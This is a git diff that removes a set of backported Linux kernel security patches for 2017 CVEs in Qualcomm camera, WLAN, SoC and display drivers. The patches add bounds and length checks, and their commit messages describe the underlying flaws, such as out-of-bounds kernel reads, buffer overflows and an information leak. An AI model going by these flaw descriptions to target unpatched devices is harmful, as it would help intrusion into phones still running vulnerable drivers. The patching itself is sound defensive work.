-From a96e06fac09e182b5211f20dd6311f93a5d056af Mon Sep 17 00:00:00 2001
-From: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
-Date: Mon, 10 Apr 2017 16:53:33 +0530
-Subject: [PATCH] msm: camera: isp: Initialize stream info
-
-Initialize the Stream info before passing as an
-argument to msm_isp_request_frame and add bound check to the
-stream index
-CRs-fixed: 2008683
-
-Bug: 64453533
-Change-Id: I0039a5d01f4f376060c8b0ba3baf4ce55acc9446
-Signed-off-by: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index 5e0b685aec801..54ab560f09137 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -3488,6 +3488,14 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- 	case UPDATE_STREAM_REQUEST_FRAMES_VER2: {
- 		struct msm_vfe_axi_stream_cfg_update_info_req_frm *req_frm =
- 			&update_cmd->req_frm_ver2;
-+		if (HANDLE_TO_IDX(req_frm->stream_handle) >= VFE_AXI_SRC_MAX) {
-+			pr_err("%s: Invalid stream handle \n", __func__);
-+			rc = -EINVAL;
-+			break;
-+		}
-+		stream_info = &axi_data->stream_info[HANDLE_TO_IDX(
-+			req_frm->stream_handle)];
-+
- 		rc = msm_isp_request_frame(vfe_dev, stream_info,
- 			req_frm->user_stream_id,
- 			req_frm->frame_id,
diff --git a/Patches/Linux_CVEs/CVE-2017-11028/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-11028/ANY/0002.patch
deleted file mode 100644
index e6d4075c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11028/ANY/0002.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From fd70b655d901e626403f132b65fc03d993f0a09b Mon Sep 17 00:00:00 2001
-From: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
-Date: Mon, 10 Apr 2017 15:11:14 +0530
-Subject: msm: camera: isp: add bound check to handle array out of access
-
-The pointer req_frm comes from userspace,
-req_frm->stream_handle is passed as an argument to
-the function msm_isp_get_stream_common_data,
-stream_idx can overflow common_data->streams[] and
-the code ends up copying an out of bound
-kernel address into stream_info. Adding bound check to
-handle the same.
-
-CRs-fixed: 2008683
-Change-Id: Ib4a059bfd573cdc4e18ce630b4091576ff8edc7e
-Signed-off-by: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c | 6 ++++++
- drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h | 5 +++++
- 2 files changed, 11 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index dce474e..8ab2e85 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -3909,6 +3909,12 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- 			&update_cmd->req_frm_ver2;
- 		stream_info = msm_isp_get_stream_common_data(vfe_dev,
- 				HANDLE_TO_IDX(req_frm->stream_handle));
-+		if (stream_info == NULL) {
-+			pr_err_ratelimited("%s: stream_info is NULL\n",
-+				__func__);
-+			rc = -EINVAL;
-+			break;
-+		}
- 		rc = msm_isp_request_frame(vfe_dev, stream_info,
- 			req_frm->user_stream_id,
- 			req_frm->frame_id,
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h
-index 65009cb..a8d4cfb 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h
-@@ -141,6 +141,11 @@ static inline struct msm_vfe_axi_stream *msm_isp_get_stream_common_data(
- 	struct msm_vfe_common_dev_data *common_data = vfe_dev->common_data;
- 	struct msm_vfe_axi_stream *stream_info;
- 
-+	if (stream_idx >= VFE_AXI_SRC_MAX) {
-+		pr_err("invalid stream_idx %d\n", stream_idx);
-+		return NULL;
-+	}
-+
- 	if (vfe_dev->is_split &&  stream_idx < RDI_INTF_0)
- 		stream_info = &common_data->streams[stream_idx];
- 	else
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11028/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-11028/ANY/0003.patch
deleted file mode 100644
index d3e560cc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11028/ANY/0003.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 6724296d3f3b2821b83219768c1b9e971e380a9f Mon Sep 17 00:00:00 2001
-From: Sriraj Hebbar <srirajh@qti.qualcomm.com>
-Date: Fri, 30 Jun 2017 13:14:28 +0530
-Subject: msm: camera: isp: Handle array out of bound access
-
-The pointer req_frm is coming from userspace, it may overflow stream_info.
-Adding a bound check to prevent the same.
-
-CRs-fixed: 2008683
-Change-Id: I8682e09ff2ab7ba490bbbd9e20db978493c5f3e4
-Signed-off-by: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
-Signed-off-by: Andy Sun <bins@codeaurora.org>
----
- drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c
-index 373a963..a85ee30 100644
---- a/drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c
-@@ -3889,6 +3889,12 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- 	case UPDATE_STREAM_REQUEST_FRAMES_VER2: {
- 		struct msm_vfe_axi_stream_cfg_update_info_req_frm *req_frm =
- 			&update_cmd->req_frm_ver2;
-+		if (HANDLE_TO_IDX(req_frm->stream_handle) >= VFE_AXI_SRC_MAX) {
-+			pr_err("%s: Invalid stream handle\n", __func__);
-+			rc = -EINVAL;
-+			break;
-+		}
-+
- 		stream_info = &axi_data->stream_info[HANDLE_TO_IDX(
- 				req_frm->stream_handle)];
- 		rc = msm_isp_request_frame(vfe_dev, stream_info,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11029/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-11029/3.10/0001.patch
deleted file mode 100644
index 1964e92c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11029/3.10/0001.patch
+++ /dev/null
@@ -1,108 +0,0 @@
-From e13a16c079cf8f5c758f5c31fbd72edca2656e54 Mon Sep 17 00:00:00 2001
-From: Jonathan Solnit <jsolnit@google.com>
-Date: Fri, 1 Sep 2017 17:21:05 -0700
-Subject: [PATCH] msm: camera2: cpp: Fix iommu_attach/detach compat_ioctl issue
-
-When the Camera application exercises the  V4L2  ioctl operations, CPP
-driver would attempt to the copy  user space buffer  contents into the
-internal kernel buffer.  If an invalid length of the user space buffer
-is passed onto the driver, it could trigger buffer overflow condition.
-
-Thus, fix this by copying user space buffer contents into kernel space
-buffer of the  driver for further processing,  only after checking for
-proper length of user space buffer.
-
-Bug: 64433362
-CRs-fixed: 2025367
-Change-Id: I85cf4a961884c7bb0d036299b886044aef7baf7c
-Signed-off-by: Ravi kumar Koyyana <rkoyyana@codeaurora.org>
-Signed-off-by: Paresh Purabhiya <ppurab@codeaurora.org>
-Signed-off-by: Jonathan Solnit <jsolnit@google.com>
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c     | 23 ++++++++++++++++------
- 1 file changed, 17 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 1dfe7f6abc312..9d7e51c37f486 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2288,11 +2288,13 @@ static void msm_cpp_fw_version(struct cpp_device *cpp_dev)
- 	msm_cpp_poll(cpp_dev->base, MSM_CPP_MSG_ID_TRAILER);
- }
- 
--static int msm_cpp_validate_input(unsigned int cmd, void *arg,
-+static int msm_cpp_validate_ioctl_input(unsigned int cmd, void *arg,
- 	struct msm_camera_v4l2_ioctl_t **ioctl_ptr)
- {
- 	switch (cmd) {
- 	case MSM_SD_SHUTDOWN:
-+	case VIDIOC_MSM_CPP_IOMMU_ATTACH:
-+	case VIDIOC_MSM_CPP_IOMMU_DETACH:
- 		break;
- 	default: {
- 		if (ioctl_ptr == NULL) {
-@@ -2301,8 +2303,9 @@ static int msm_cpp_validate_input(unsigned int cmd, void *arg,
- 		}
- 
- 		*ioctl_ptr = arg;
--		if ((*ioctl_ptr == NULL) ||
--			(*ioctl_ptr)->ioctl_ptr == NULL) {
-+		if (((*ioctl_ptr) == NULL) ||
-+			((*ioctl_ptr)->ioctl_ptr == NULL) ||
-+			((*ioctl_ptr)->len == 0)) {
- 			pr_err("Error invalid ioctl argument cmd %u", cmd);
- 			return -EINVAL;
- 		}
-@@ -2334,7 +2337,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- 		return -EINVAL;
- 	}
- 
--	rc = msm_cpp_validate_input(cmd, arg, &ioctl_ptr);
-+	rc = msm_cpp_validate_ioctl_input(cmd, arg, &ioctl_ptr);
- 	if (rc != 0) {
- 		pr_err("input validation failed\n");
- 		return rc;
-@@ -2799,6 +2802,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- 				pr_err("%s:%dError iommu_attach_device failed\n",
- 					__func__, __LINE__);
- 				rc = -EINVAL;
-+				break;
- 			}
- 			cpp_dev->iommu_state = CPP_IOMMU_STATE_ATTACHED;
- 		} else {
-@@ -2813,10 +2817,17 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- 			(cpp_dev->stream_cnt == 0)) {
- 			iommu_detach_device(cpp_dev->domain,
- 				cpp_dev->iommu_ctx);
-+			if (rc < 0) {
-+				pr_err("%s:%dError iommu detach failed\n",
-+					__func__, __LINE__);
-+				rc = -EINVAL;
-+				break;
-+			}
- 			cpp_dev->iommu_state = CPP_IOMMU_STATE_DETACHED;
- 		} else {
- 			pr_err("%s:%d IOMMMU attach triggered in invalid state\n",
- 				__func__, __LINE__);
-+			rc = -EINVAL;
- 		}
- 		break;
- 	}
-@@ -3422,7 +3433,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- 	default:
- 		pr_err_ratelimited("%s: unsupported compat type :%x LOAD %lu\n",
- 				__func__, cmd, VIDIOC_MSM_CPP_LOAD_FIRMWARE);
--		break;
-+		return -EINVAL;
- 	}
- 
- 	switch (cmd) {
-@@ -3448,7 +3459,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- 	default:
- 		pr_err_ratelimited("%s: unsupported compat type :%d\n",
- 				__func__, cmd);
--		break;
-+		return -EINVAL;
- 	}
- 
- 	up32_ioctl.id = kp_ioctl.id;
diff --git a/Patches/Linux_CVEs/CVE-2017-11029/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-11029/3.18/0002.patch
deleted file mode 100644
index 20b8fd68..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11029/3.18/0002.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 74ab23917b82769644a3299da47b58e080aa63f2 Mon Sep 17 00:00:00 2001
-From: Terence Ho <terenceh@codeaurora.org>
-Date: Fri, 26 May 2017 15:05:07 -0400
-Subject: msm: ais: cpp fix to check zero length ioctl
-
-Port of ioctl validation for zero length ioctl
-from camera_v2.
-
-Change-Id: I635522f331d1e18641196ee3101c64ccc285636a
-CRs-fixed: 2025367
-Signed-off-by: Terence Ho <terenceh@codeaurora.org>
----
- drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c
-index 0e1c6b4..d265210 100644
---- a/drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c
-@@ -2889,6 +2889,8 @@ static int msm_cpp_validate_ioctl_input(unsigned int cmd, void *arg,
- 	case MSM_SD_SHUTDOWN:
- 	case MSM_SD_NOTIFY_FREEZE:
- 	case MSM_SD_UNNOTIFY_FREEZE:
-+	case VIDIOC_MSM_CPP_IOMMU_ATTACH:
-+	case VIDIOC_MSM_CPP_IOMMU_DETACH:
- 		break;
- 	default: {
- 		if (ioctl_ptr == NULL) {
-@@ -2897,8 +2899,9 @@ static int msm_cpp_validate_ioctl_input(unsigned int cmd, void *arg,
- 		}
- 
- 		*ioctl_ptr = arg;
--		if ((*ioctl_ptr == NULL) ||
--			(*ioctl_ptr)->ioctl_ptr == NULL) {
-+		if (((*ioctl_ptr) == NULL) ||
-+			((*ioctl_ptr)->ioctl_ptr == NULL) ||
-+			((*ioctl_ptr)->len == 0)) {
- 			pr_err("Error invalid ioctl argument cmd %u", cmd);
- 			return -EINVAL;
- 		}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11029/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-11029/4.4/0003.patch
deleted file mode 100644
index e5441156..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11029/4.4/0003.patch
+++ /dev/null
@@ -1,147 +0,0 @@
-From 86f0d207d478e1681f6711b46766cfb3c6a30fb5 Mon Sep 17 00:00:00 2001
-From: Ravi kumar Koyyana <rkoyyana@codeaurora.org>
-Date: Mon, 27 Mar 2017 17:44:36 -0700
-Subject: msm: camera2: cpp: Fix iommu_attach/detach compat_ioctl issue
-
-When the Camera application exercises 32-bit version of the V4L2 ioctl
-operation, it results accessing  user space  memory illegally. This is
-due to the direct access of user space buffer by Camera CPP driver.
-
-Thus, fix this by copying user space buffer contents into kernel space
-buffer of the  driver for  further processing. Only after checking for
-proper length of user space buffer, proceed further. This will prevent
-the buffer overflow and invalid memory access.
-
-CRs-fixed: 2025367
-Change-Id: I85cf4a961884c7bb0d036299b886044aef7baf7c
-Signed-off-by: Ravi kumar Koyyana <rkoyyana@codeaurora.org>
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c     | 49 ++++++++++++++++------
- 1 file changed, 37 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 8402e31..95aac07 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2953,8 +2953,9 @@ static int msm_cpp_validate_input(unsigned int cmd, void *arg,
- 		}
- 
- 		*ioctl_ptr = arg;
--		if ((*ioctl_ptr == NULL) ||
--			((*ioctl_ptr)->ioctl_ptr == NULL)) {
-+		if (((*ioctl_ptr) == NULL) ||
-+			((*ioctl_ptr)->ioctl_ptr == NULL) ||
-+			((*ioctl_ptr)->len == 0)) {
- 			pr_err("Error invalid ioctl argument cmd %u", cmd);
- 			return -EINVAL;
- 		}
-@@ -3503,13 +3504,18 @@ STREAM_BUFF_END:
- 		if (cpp_dev->iommu_state == CPP_IOMMU_STATE_DETACHED) {
- 			struct msm_camera_smmu_attach_type cpp_attach_info;
- 
-+			if (ioctl_ptr->len !=
-+				sizeof(struct msm_camera_smmu_attach_type)) {
-+				rc = -EINVAL;
-+				break;
-+			}
-+
- 			memset(&cpp_attach_info, 0, sizeof(cpp_attach_info));
- 			rc = msm_cpp_copy_from_ioctl_ptr(&cpp_attach_info,
- 				ioctl_ptr);
- 			if (rc < 0) {
- 				pr_err("CPP_IOMMU_ATTACH copy from user fail");
--				ERR_COPY_FROM_USER();
--				return -EINVAL;
-+				break;
- 			}
- 
- 			cpp_dev->security_mode = cpp_attach_info.attach;
-@@ -3538,16 +3544,20 @@ STREAM_BUFF_END:
- 	case VIDIOC_MSM_CPP_IOMMU_DETACH: {
- 		if ((cpp_dev->iommu_state == CPP_IOMMU_STATE_ATTACHED) &&
- 			(cpp_dev->stream_cnt == 0)) {
--
- 			struct msm_camera_smmu_attach_type cpp_attach_info;
- 
-+			if (ioctl_ptr->len !=
-+				sizeof(struct msm_camera_smmu_attach_type)) {
-+				rc = -EINVAL;
-+				break;
-+			}
-+
- 			memset(&cpp_attach_info, 0, sizeof(cpp_attach_info));
- 			rc = msm_cpp_copy_from_ioctl_ptr(&cpp_attach_info,
- 				ioctl_ptr);
- 			if (rc < 0) {
- 				pr_err("CPP_IOMMU_DETTACH copy from user fail");
--				ERR_COPY_FROM_USER();
--				return -EINVAL;
-+				break;
- 			}
- 
- 			cpp_dev->security_mode = cpp_attach_info.attach;
-@@ -3568,6 +3578,7 @@ STREAM_BUFF_END:
- 		} else {
- 			pr_err("%s:%d IOMMMU attach triggered in invalid state\n",
- 				__func__, __LINE__);
-+			rc = -EINVAL;
- 		}
- 		break;
- 	}
-@@ -3883,6 +3894,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- 	struct msm_cpp_stream_buff_info_t k_cpp_buff_info;
- 	struct msm_cpp_frame_info32_t k32_frame_info;
- 	struct msm_cpp_frame_info_t k64_frame_info;
-+	struct msm_camera_smmu_attach_type kb_cpp_smmu_attach_info;
- 	uint32_t identity_k = 0;
- 	bool is_copytouser_req = true;
- 	void __user *up = (void __user *)arg;
-@@ -4187,11 +4199,23 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- 		break;
- 	}
- 	case VIDIOC_MSM_CPP_IOMMU_ATTACH32:
--		cmd = VIDIOC_MSM_CPP_IOMMU_ATTACH;
--		break;
- 	case VIDIOC_MSM_CPP_IOMMU_DETACH32:
--		cmd = VIDIOC_MSM_CPP_IOMMU_DETACH;
-+	{
-+		if ((kp_ioctl.len != sizeof(struct msm_camera_smmu_attach_type))
-+			|| (copy_from_user(&kb_cpp_smmu_attach_info,
-+				(void __user *)kp_ioctl.ioctl_ptr,
-+				sizeof(kb_cpp_smmu_attach_info)))) {
-+			mutex_unlock(&cpp_dev->mutex);
-+			return -EINVAL;
-+		}
-+
-+		kp_ioctl.ioctl_ptr = (void *)&kb_cpp_smmu_attach_info;
-+		is_copytouser_req = false;
-+		cmd = (cmd == VIDIOC_MSM_CPP_IOMMU_ATTACH32) ?
-+			VIDIOC_MSM_CPP_IOMMU_ATTACH :
-+			VIDIOC_MSM_CPP_IOMMU_DETACH;
- 		break;
-+	}
- 	case MSM_SD_NOTIFY_FREEZE:
- 		break;
- 	case MSM_SD_UNNOTIFY_FREEZE:
-@@ -4202,7 +4226,8 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- 	default:
- 		pr_err_ratelimited("%s: unsupported compat type :%x LOAD %lu\n",
- 				__func__, cmd, VIDIOC_MSM_CPP_LOAD_FIRMWARE);
--		break;
-+		mutex_unlock(&cpp_dev->mutex);
-+		return -EINVAL;
- 	}
- 
- 	mutex_unlock(&cpp_dev->mutex);
-@@ -4233,7 +4258,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- 	default:
- 		pr_err_ratelimited("%s: unsupported compat type :%d\n",
- 				__func__, cmd);
--		break;
-+		return -EINVAL;
- 	}
- 
- 	if (is_copytouser_req) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11032/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11032/ANY/0001.patch
deleted file mode 100644
index 117f5efa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11032/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 2720294757d0ad5294283c15dc837852f7b2329a Mon Sep 17 00:00:00 2001
-From: Gaurav Kohli <gkohli@codeaurora.org>
-Date: Thu, 4 Aug 2016 17:40:15 +0530
-Subject: soc: qcom: Initialize message pointer with NULL
-
-During service locator call there is a chance in which
-resp message is used or freed while uninitialized.So to
-prevent it initialize the same with NULL.
-
-Change-Id: I65f854e184606684ce2ca711f19cf61d26c1ecb5
-Signed-off-by: Gaurav Kohli <gkohli@codeaurora.org>
----
- drivers/soc/qcom/service-locator.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/soc/qcom/service-locator.c b/drivers/soc/qcom/service-locator.c
-index 76d754d..c204947 100644
---- a/drivers/soc/qcom/service-locator.c
-+++ b/drivers/soc/qcom/service-locator.c
-@@ -202,8 +202,8 @@ static int servreg_loc_send_msg(struct msg_desc *req_desc,
- static int service_locator_send_msg(struct pd_qmi_client_data *pd)
- {
- 	struct msg_desc req_desc, resp_desc;
--	struct qmi_servreg_loc_get_domain_list_resp_msg_v01 *resp;
--	struct qmi_servreg_loc_get_domain_list_req_msg_v01 *req;
-+	struct qmi_servreg_loc_get_domain_list_resp_msg_v01 *resp = NULL;
-+	struct qmi_servreg_loc_get_domain_list_req_msg_v01 *req = NULL;
- 	int rc;
- 	int db_rev_count = 0, domains_read = 0;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11035/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11035/qcacld-2.0/0001.patch
deleted file mode 100644
index 511300b0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11035/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,72 +0,0 @@
-From cc1896424ae7a346090f601bc69c6ca51d9c3e04 Mon Sep 17 00:00:00 2001
-From: Nishank Aggarwal <naggar@codeaurora.org>
-Date: Tue, 27 Jun 2017 12:34:21 +0530
-Subject: qcacld-2.0: Add check for set_ft_ies buffer length
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Add check for buffer length in function sme_set_ft_ies.
-
-Change-Id: I7adc56e23316c0ceb193a5bdf8c4c0b5f4fbd20a
-CRs-Fixed: 2070583
----
- CORE/HDD/src/wlan_hdd_wext.c        | 4 ++++
- CORE/SME/src/sme_common/sme_FTApi.c | 8 +++-----
- 2 files changed, 7 insertions(+), 5 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 72d499c..562f20f 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -12598,6 +12598,10 @@ static const struct iw_priv_args we_private_args[] = {
-     {   WE_DUMP_DP_TRACE_LEVEL,
-         IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 2,
-         0, "dump_dp_trace"},
-+    {
-+        WLAN_PRIV_SET_FTIES,
-+        IW_PRIV_TYPE_CHAR | MAX_FTIE_SIZE,
-+        0, "set_ft_ies"},
- };
- 
- 
-diff --git a/CORE/SME/src/sme_common/sme_FTApi.c b/CORE/SME/src/sme_common/sme_FTApi.c
-index 26a7ef8..16b1f09 100644
---- a/CORE/SME/src/sme_common/sme_FTApi.c
-+++ b/CORE/SME/src/sme_common/sme_FTApi.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -163,6 +163,7 @@ void sme_SetFTIEs(tHalHandle hHal, tANI_U32 sessionId, const tANI_U8 *ft_ies,
-    {
-       case eFT_START_READY:
-       case eFT_AUTH_REQ_READY:
-+         smsLog( pMac, LOG1, FL("ft_ies_length: %d"), ft_ies_length);
-          if ((pSession->ftSmeContext.auth_ft_ies) &&
-                (pSession->ftSmeContext.auth_ft_ies_length))
-          {
-@@ -171,7 +172,7 @@ void sme_SetFTIEs(tHalHandle hHal, tANI_U32 sessionId, const tANI_U8 *ft_ies,
-             pSession->ftSmeContext.auth_ft_ies_length = 0;
-             pSession->ftSmeContext.auth_ft_ies = NULL;
-          }
--
-+         ft_ies_length = MIN(ft_ies_length, MAX_FTIE_SIZE);
-          // Save the FT IEs
-          pSession->ftSmeContext.auth_ft_ies =
-             vos_mem_malloc(ft_ies_length);
-@@ -187,9 +188,6 @@ void sme_SetFTIEs(tHalHandle hHal, tANI_U32 sessionId, const tANI_U8 *ft_ies,
-                ft_ies,ft_ies_length);
-          pSession->ftSmeContext.FTState = eFT_AUTH_REQ_READY;
- 
--#if defined WLAN_FEATURE_VOWIFI_11R_DEBUG
--         smsLog( pMac, LOG1, "ft_ies_length=%d", ft_ies_length);
--#endif
-          break;
- 
-       case eFT_AUTH_COMPLETE:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11035/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-11035/qcacld-3.0/0002.patch
deleted file mode 100644
index 1e2f4867..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11035/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From c5060da3e741577578d66dfadb7922d853da6156 Mon Sep 17 00:00:00 2001
-From: Naveen Rawat <naveenrawat@codeaurora.org>
-Date: Tue, 13 Jun 2017 17:29:51 -0700
-Subject: qcacld-3.0: Add check for set_ft_ies buffer length
-
-Add check for buffer length in function sme_set_ft_ies.
-
-Change-Id: I7adc56e23316c0ceb193a5bdf8c4c0b5f4fbd20a
-CRs-Fixed: 2055659
----
- core/hdd/src/wlan_hdd_wext.c     | 5 +++++
- core/sme/src/common/sme_ft_api.c | 4 ++--
- 2 files changed, 7 insertions(+), 2 deletions(-)
-
-diff --git a/core/hdd/src/wlan_hdd_wext.c b/core/hdd/src/wlan_hdd_wext.c
-index 637588d..9b35d19 100644
---- a/core/hdd/src/wlan_hdd_wext.c
-+++ b/core/hdd/src/wlan_hdd_wext.c
-@@ -13692,6 +13692,11 @@ static const struct iw_priv_args we_private_args[] = {
- 	 IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
- 	 "hostroamdelay"}
- 	,
-+
-+	{WLAN_PRIV_SET_FTIES,
-+	 IW_PRIV_TYPE_CHAR | MAX_FTIE_SIZE,
-+	 0,
-+	 "set_ft_ies"},
- };
- 
- const struct iw_handler_def we_handler_def = {
-diff --git a/core/sme/src/common/sme_ft_api.c b/core/sme/src/common/sme_ft_api.c
-index de4b656..f97b2e4 100644
---- a/core/sme/src/common/sme_ft_api.c
-+++ b/core/sme/src/common/sme_ft_api.c
-@@ -150,6 +150,7 @@ void sme_set_ft_ies(tHalHandle hal_ptr, uint32_t session_id,
- 	switch (session->ftSmeContext.FTState) {
- 	case eFT_START_READY:
- 	case eFT_AUTH_REQ_READY:
-+		sme_debug("ft_ies_length: %d", ft_ies_length);
- 		if ((session->ftSmeContext.auth_ft_ies) &&
- 			(session->ftSmeContext.auth_ft_ies_length)) {
- 			/* Free the one we recvd last from supplicant */
-@@ -157,6 +158,7 @@ void sme_set_ft_ies(tHalHandle hal_ptr, uint32_t session_id,
- 			session->ftSmeContext.auth_ft_ies_length = 0;
- 			session->ftSmeContext.auth_ft_ies = NULL;
- 		}
-+		ft_ies_length = QDF_MIN(ft_ies_length, MAX_FTIE_SIZE);
- 		/* Save the FT IEs */
- 		session->ftSmeContext.auth_ft_ies =
- 					qdf_mem_malloc(ft_ies_length);
-@@ -169,8 +171,6 @@ void sme_set_ft_ies(tHalHandle hal_ptr, uint32_t session_id,
- 		qdf_mem_copy((uint8_t *)session->ftSmeContext.auth_ft_ies,
- 				ft_ies, ft_ies_length);
- 		session->ftSmeContext.FTState = eFT_AUTH_REQ_READY;
--
--		sme_debug("ft_ies_length: %d", ft_ies_length);
- 		break;
- 
- 	case eFT_AUTH_COMPLETE:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11040/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11040/ANY/0001.patch
deleted file mode 100644
index 6e70834b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11040/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 7a4d0eea0ca0c8a72111ae58d9829be817f102c9 Mon Sep 17 00:00:00 2001
-From: Ashish Garg <ashigarg@codeaurora.org>
-Date: Fri, 9 Jun 2017 16:21:20 +0530
-Subject: msm: mdss: validate number of cea blocks before reading from edid_buf
-
-Number of cea blocks are read from edid buffer which comes from the
-user. If the number of cea blocks are more than the supported blocks
-kernel information leak is possible by reading more data than is
-present in edid_buf.
-
-Change-Id: I03b8456ff1e1a7b15d711f06908bd5c83f83cc02
-Signed-off-by: Ashish Garg <ashigarg@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_hdmi_tx.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
